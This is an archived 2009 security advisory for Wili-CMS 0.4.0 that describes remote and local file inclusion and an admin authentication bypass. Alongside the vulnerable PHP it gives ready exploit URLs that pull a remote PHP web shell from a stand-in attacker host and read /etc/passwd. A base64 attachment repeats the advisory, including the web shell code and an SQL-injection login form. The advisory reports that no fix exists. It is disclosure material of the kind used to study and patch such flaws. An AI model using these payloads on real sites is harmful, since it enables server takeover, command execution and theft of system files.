Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: va2788.htm

Wili-CMS 0.4.0 Multiple Vulnerabilities (Remote/Local File Inclusion - Authentication Bypass)



Wili-CMS 0.4.0 Multiple Vulnerabilities (Remote/Local File Inclusion - Authentication Bypass)
Wili-CMS 0.4.0 Multiple Vulnerabilities (Remote/Local File Inclusion - Authentication Bypass)



--001636c5b2f080c3b7046472185b
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Wili-CMS
[+] Version: 0.4.0
[+] Website: http://wili-cms.sourceforge.net/ 

[+] Bugs: [A] Multiple Remote/Local File Inclusion
          [B] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 06 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Multiple Remote/Local File Inclusion

[-] Requisites: none
[-] File affected: index.php

This bug allows a guest to include remote and
local files and however to exec remote commands.

...

if ( $globals['dbh'] && !pageExists( $globals['pageid']['pid'] ) ) {
    include( $globals['content_dir'].$globals['template_dir']."error404.php" );
}

...

include( template_file( $globals['root_template'] ) );


- [B] Authentication Bypass

[-] Requisites: magic_quotes_gpc = off
[-] File affected: lib/admin/init_session.php

This bug allows a guest to login as admin.

...

$_SESSION['password'] = $_REQUEST['password'] ? $_REQUEST['password']
: $_SESSION['password'];
$globals['username'] = $_SESSION['uname'] = $_REQUEST['uname'] ?
$_REQUEST['uname'] : $_SESSION['uname'];

...

$sth = mysql_query(
       "SELECT id
        FROM ".$globals['userstable']."
        WHERE username='".$_SESSION['uname']."'
        AND adminflag=1
        AND password=PASSWORD('".$_SESSION['password']."')", $globals['dbh'] );

      // password ok -> login
if ( mysql_num_rows( $sth ) && ( $globals['uid'] = mysql_result($sth,0) ) ) {
	$globals['user'] = mysql_result( $userh = mysql_query( "SELECT id,
skipwelcome FROM ".$globals['userstable']." WHERE
username='".$globals['username']."'", $globals['dbh'] ),0,0);

    if ( $globals['admin_modus'] == "loggedin" ) {
         // log login
         db_addlog( "Logged in from ".getenv("REMOTE_ADDR") );
         // goto welcome page if skipwelcome flag of this user is not set
         if ( !(mysql_result( $userh, 0, 1 )) ) {
           $_REQUEST['npage'] = get_firstpage( "adminwelcome" );
         }
         $globals['admin_modus'] = "";
    }

    ...


*************************************************

[+] Code


- [A] Multiple Remote/Local File Inclusion

shell.txt: 

http://www.site.com/path/?npage=-1&content_dir=http://www.evilsite.com/shell.txt%00&cmd=ls 
http://www.site.com/path/?npage=1&content_dir=http://www.evilsite.com/shell.txt%00&cmd=ls 

http://www.site.com/path/?npage=-1&content_dir=../../../../etc/passwd%00 
http://www.site.com/path/?npage=1&content_dir=../../../../etc/passwd%00 


- [B] Authentication Bypass


  
    Wili-CMS 0.4.0 Authentication Bypass Exploit
  
  
action="http://www.site.com/path/admin.php" method="POST">
************************************************* [+] Fix No fix. ************************************************* -- Salvatore "drosophila" Fresta CWNP444351 --001636c5b2f080c3b7046472185b Content-Type: text/plain; charset=US-ASCII; name="Wili-CMS 0.4.0 Multiple Vulnerabilities-06032009.txt" Content-Disposition: attachment; filename="Wili-CMS 0.4.0 Multiple Vulnerabilities-06032009.txt" Content-Transfer-Encoding: base64 X-Attachment-Id: f_frytk6mg0 KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw cGxpY2F0aW9uOiBXaWxpLUNNUwpbK10gVmVyc2lvbjogMC40LjAKWytdIFdlYnNpdGU6IGh0dHA6 Ly93aWxpLWNtcy5zb3VyY2Vmb3JnZS5uZXQvCgpbK10gQnVnczogW0FdIE11bHRpcGxlIFJlbW90 ZS9Mb2NhbCBGaWxlIEluY2x1c2lvbgogICAgICAgICAgW0JdIEF1dGhlbnRpY2F0aW9uIEJ5cGFz cwoKWytdIEV4cGxvaXRhdGlvbjogUmVtb3RlClsrXSBEYXRlOiAwNiBNYXIgMjAwOQoKWytdIERp c2NvdmVyZWQgYnk6IFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBBdXRob3I6IFNh bHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBDb250YWN0OiBlLW1haWw6IGRyb3NvcGhp bGF4eHhAZ21haWwuY29tCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKgoKWytdIE1lbnUKCjEpIEJ1Z3MKMikgQ29kZQozKSBGaXgKCgoqKioqKioqKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gQnVncwoKCi0gW0Fd IE11bHRpcGxlIFJlbW90ZS9Mb2NhbCBGaWxlIEluY2x1c2lvbgoKWy1dIFJlcXVpc2l0ZXM6IG5v bmUKWy1dIEZpbGUgYWZmZWN0ZWQ6IGluZGV4LnBocAoKVGhpcyBidWcgYWxsb3dzIGEgZ3Vlc3Qg dG8gaW5jbHVkZSByZW1vdGUgYW5kCmxvY2FsIGZpbGVzIGFuZCBob3dldmVyIHRvIGV4ZWMgcmVt b3RlIGNvbW1hbmRzLgoKLi4uCgppZiAoICRnbG9iYWxzWydkYmgnXSAmJiAhcGFnZUV4aXN0cygg JGdsb2JhbHNbJ3BhZ2VpZCddWydwaWQnXSApICkgewogICAgaW5jbHVkZSggJGdsb2JhbHNbJ2Nv bnRlbnRfZGlyJ10uJGdsb2JhbHNbJ3RlbXBsYXRlX2RpciddLiJlcnJvcjQwNC5waHAiICk7Cn0K ICAKLi4uCgppbmNsdWRlKCB0ZW1wbGF0ZV9maWxlKCAkZ2xvYmFsc1sncm9vdF90ZW1wbGF0ZSdd ICkgKTsKCgotIFtCXSBBdXRoZW50aWNhdGlvbiBCeXBhc3MKClstXSBSZXF1aXNpdGVzOiBtYWdp Y19xdW90ZXNfZ3BjID0gb2ZmClstXSBGaWxlIGFmZmVjdGVkOiBsaWIvYWRtaW4vaW5pdF9zZXNz aW9uLnBocAoKVGhpcyBidWcgYWxsb3dzIGEgZ3Vlc3QgdG8gbG9naW4gYXMgYWRtaW4uCgouLi4K CiRfU0VTU0lPTlsncGFzc3dvcmQnXSA9ICRfUkVRVUVTVFsncGFzc3dvcmQnXSA/ICRfUkVRVUVT VFsncGFzc3dvcmQnXSA6ICRfU0VTU0lPTlsncGFzc3dvcmQnXTsKJGdsb2JhbHNbJ3VzZXJuYW1l J10gPSAkX1NFU1NJT05bJ3VuYW1lJ10gPSAkX1JFUVVFU1RbJ3VuYW1lJ10gPyAkX1JFUVVFU1Rb J3VuYW1lJ10gOiAkX1NFU1NJT05bJ3VuYW1lJ107CiAgCi4uLgoKJHN0aCA9IG15c3FsX3F1ZXJ5 KCAKICAgICAgICJTRUxFQ1QgaWQgCiAgICAgICAgRlJPTSAiLiRnbG9iYWxzWyd1c2Vyc3RhYmxl J10uIgogICAgICAgIFdIRVJFIHVzZXJuYW1lPSciLiRfU0VTU0lPTlsndW5hbWUnXS4iJyAKICAg ICAgICBBTkQgYWRtaW5mbGFnPTEgCiAgICAgICAgQU5EIHBhc3N3b3JkPVBBU1NXT1JEKCciLiRf U0VTU0lPTlsncGFzc3dvcmQnXS4iJykiLCAkZ2xvYmFsc1snZGJoJ10gKTsKICAKICAgICAgLy8g cGFzc3dvcmQgb2sgLT4gbG9naW4gICAgCmlmICggbXlzcWxfbnVtX3Jvd3MoICRzdGggKSAmJiAo ICRnbG9iYWxzWyd1aWQnXSA9IG15c3FsX3Jlc3VsdCgkc3RoLDApICkgKSB7CgkkZ2xvYmFsc1sn dXNlciddID0gbXlzcWxfcmVzdWx0KCAkdXNlcmggPSBteXNxbF9xdWVyeSggIlNFTEVDVCBpZCwg c2tpcHdlbGNvbWUgRlJPTSAiLiRnbG9iYWxzWyd1c2Vyc3RhYmxlJ10uIiBXSEVSRSB1c2VybmFt ZT0nIi4kZ2xvYmFsc1sndXNlcm5hbWUnXS4iJyIsICRnbG9iYWxzWydkYmgnXSApLDAsMCk7CiAg ICAKICAgIGlmICggJGdsb2JhbHNbJ2FkbWluX21vZHVzJ10gPT0gImxvZ2dlZGluIiApIHsgIAog ICAgICAgICAvLyBsb2cgbG9naW4KICAgICAgICAgZGJfYWRkbG9nKCAiTG9nZ2VkIGluIGZyb20g Ii5nZXRlbnYoIlJFTU9URV9BRERSIikgKTsgICAgICAgICAKICAgICAgICAgLy8gZ290byB3ZWxj b21lIHBhZ2UgaWYgc2tpcHdlbGNvbWUgZmxhZyBvZiB0aGlzIHVzZXIgaXMgbm90IHNldAogICAg ICAgICBpZiAoICEobXlzcWxfcmVzdWx0KCAkdXNlcmgsIDAsIDEgKSkgKSB7CiAgICAgICAgICAg JF9SRVFVRVNUWyducGFnZSddID0gZ2V0X2ZpcnN0cGFnZSggImFkbWlud2VsY29tZSIgKTsKICAg ICAgICAgfQogICAgICAgICAkZ2xvYmFsc1snYWRtaW5fbW9kdXMnXSA9ICIiOwogICAgfQogICAg CiAgICAuLi4KCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqCgpbK10gQ29kZQoKCi0gW0FdIE11bHRpcGxlIFJlbW90ZS9Mb2NhbCBGaWxlIEluY2x1c2lv bgoKc2hlbGwudHh0OiA8P3BocCBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4KCmh0dHA6Ly93d3cu c2l0ZS5jb20vcGF0aC8/bnBhZ2U9LTEmY29udGVudF9kaXI9aHR0cDovL3d3dy5ldmlsc2l0ZS5j b20vc2hlbGwudHh0JTAwJmNtZD1scwpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvP25wYWdlPTEm Y29udGVudF9kaXI9aHR0cDovL3d3dy5ldmlsc2l0ZS5jb20vc2hlbGwudHh0JTAwJmNtZD1scwoK aHR0cDovL3d3dy5zaXRlLmNvbS9wYXRoLz9ucGFnZT0tMSZjb250ZW50X2Rpcj0uLi8uLi8uLi8u Li9ldGMvcGFzc3dkJTAwCmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC8/bnBhZ2U9MSZjb250ZW50 X2Rpcj0uLi8uLi8uLi8uLi9ldGMvcGFzc3dkJTAwCgoKLSBbQl0gQXV0aGVudGljYXRpb24gQnlw YXNzCgo8aHRtbD4KICA8aGVhZD4KICAgIDx0aXRsZT5XaWxpLUNNUyAwLjQuMCBBdXRoZW50aWNh dGlvbiBCeXBhc3MgRXhwbG9pdDwvdGl0bGU+CiAgPC9oZWFkPgogIDxib2R5PgogICAgPGZvcm0g YWN0aW9uPSJodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvYWRtaW4ucGhwIiBtZXRob2Q9IlBPU1Qi PgogICAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0idW5hbWUiIHZhbHVlPSJhZG1pbiI+CiAg ICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhc3N3b3JkIiB2YWx1ZT0iMScpIFVOSU9O IEFMTCBTRUxFQ1QgMSMiPgogICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJtb2RlIiB2 YWx1ZT0ibG9nZ2VkaW4iPgogICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJucGFnZSIg dmFsdWU9IjEiPgogICAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhwbG9pdCI+CiAg ICA8L2Zvcm0+CiAgPC9ib2R5Pgo8L2h0bWw+CgoKKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKioqKgoKWytdIEZpeAoKTm8gZml4LgoKCioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKio--001636c5b2f080c3b7046472185b--


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH